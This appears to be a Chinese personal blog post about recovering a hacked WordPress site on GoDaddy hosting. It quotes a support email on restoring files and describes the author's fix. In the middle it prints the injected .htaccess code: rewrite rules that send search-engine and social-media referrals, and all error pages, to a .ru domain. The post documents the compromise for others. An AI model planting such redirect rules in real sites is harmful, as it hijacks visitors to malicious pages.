/ wordpress

修复被恶意修改的.htaccess文件所带来的站点转向

本站是从godaddy购买的域名与空间,安装了wordpress作为内容发布平台。从2012年7月10日发现站点无法打开,提示“此网页包含重定向循环”。给出错误链接:http://yinguobing.com/var/chroot/home/yinguobing/public_html/htttp://reltime2012.ru/frunleh?9
具体如下图所示。

google了半天也没有结果,微博上求助返回的也大多是类似清空cookies的回答。给godaddy去邮件咨询,回复如下:

Dear Guobing,

Thank you for contacting Online Support.

I understand you are asking about your site getting an error. Upon review of your account, there is a redirect in your .htaccess file. You will have to remove it from the file or restore it for it to work. We will not be able to a help you with removing the redirect, since it is a coding issue and we do not support 3rd part coding.

Hosting History is a feature in Linux shared hosting that allows you to restore files or directories to their previous state from up to 30 days ago using the FTP File Manager.

Restore a File or Directory

Log in to your Account Manager.

Click Web Hosting.

Next to the hosting account you want to use, click Launch.

In the Tools section of the Hosting Control Center, click the FTP File Manager icon. Then click the History button.

Use the directory tree to navigate to where the file or folder resides that you want to restore.

Below the toolbar, click the calendar icon to open the Quick Pick Calendar and select the date where you would like the file or folder restored. The directory list will refresh and display the version of your hosting account from the date selected.

Click the check box next to the file or folder you want to restore and click Restore in the tool bar.

In the Restore Files or Directories pop-in, select if you want the files to be copied to a new directory, or if you want to rename the files. When you’re finished, click OK.

Your files will be restored with the attributes you selected.

Please let us know if we can assist you in any other way.

Sincerely,
Kurt P.
Online Support

我把全文摘在了上边。从客服的回复看出,问题出在了.htaccess文件上。打开服务器根目录下的.htaccess文件,内容如下:

<IfModule mod_rewrite.c>  
 RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|searc  
 h|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr).(.*)

 RewriteRule ^(.*)$ http://1-reltime.ru/martinez?6 [R=301,L]  
 </IfModule>

 # BEGIN WordPress

 # END WordPress

ErrorDocument 400 http://1-reltime.ru/martinez?6  
 ErrorDocument 401 http://1-reltime.ru/martinez?6  
 ErrorDocument 403 http://1-reltime.ru/martinez?6  
 ErrorDocument 404 http://1-reltime.ru/martinez?6  
 ErrorDocument 500 http://1-reltime.ru/martinez?6

恶意转向的代码如上所示。对方给出的方法是用godaddy提供的备份功能恢复文件。godaddy默认备份了过去30天的所有文件。可惜我没有看懂客服的意思,以为要恢复整个站点的文件。考虑到有些日志恢复后会被删除,有点投鼠忌器,于是就把事情放下了。第二天就被拉走封闭式军训10天。这给后边解决问题带来了极大的困难。

军训后归来,参加公司全天候的入职培训,宿舍暂时不能上网,修复网站的事情耽搁到了7月31号。这时我发现网站的备份最早也是7月1日,而且当天的.htaccess文件已经是错误的。在godaddy的FTP FILE MANAGER中试图修改该文件,但是提示无法保存。将该文件下载到本地后,用记事本打开,格式却又发生了变化,应该是没有考虑到windows和linux的区别造成的。将恶意转向的地址放在google中搜索,首先检索到了google group中关于这个恶意转向的讨论,然后有人给出了解决方法。按照该方法操作后,问题终于解决。

经验:问题发生后首先向负责人询问是最快捷的途径。

教训:站点要经常备份,wordpress要及时更新,插件与主题安装要慎重。

Yin Guobing

Yin Guobing

BOE技术研发工程师🔬,业余码农😳,蓝猫铲屎官🐈。曾独立开发了一款iOS APP并上线🎉。现居北京,正在为了理想中的生活而奋斗..

Read More